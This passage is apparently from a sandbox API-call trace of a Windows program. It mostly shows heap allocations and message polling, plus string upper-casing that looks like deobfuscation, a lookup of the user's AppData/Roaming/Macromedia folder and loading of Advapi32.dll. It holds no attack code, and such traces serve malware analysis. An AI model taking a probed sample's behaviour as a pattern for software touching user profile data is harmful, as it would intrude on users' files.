wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0200.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0200.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0200.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0200.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Macromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cromedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0200.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="romedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omedia", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0200.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0200.721] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0200.721] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0200.721] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0200.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0200.721] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0200.722] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0200.722] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.722] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.722] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0200.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.723] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Macromedia", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x9ad0039, dwReserved1=0x17bf6, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 0xaa58e0 [0200.723] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0200.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.724] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0200.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.726] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.726] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0200.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa098 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0200.726] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.727] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.727] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.727] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa278 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0200.728] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0200.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.728] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.729] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0200.729] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0200.730] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.730] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0200.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0200.731] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.731] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0200.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0200.732] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0200.732] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.733] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0200.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.733] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0200.733] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0200.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0200.733] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a95b8 [0200.733] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0200.734] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0200.734] RtlAllocateHeap 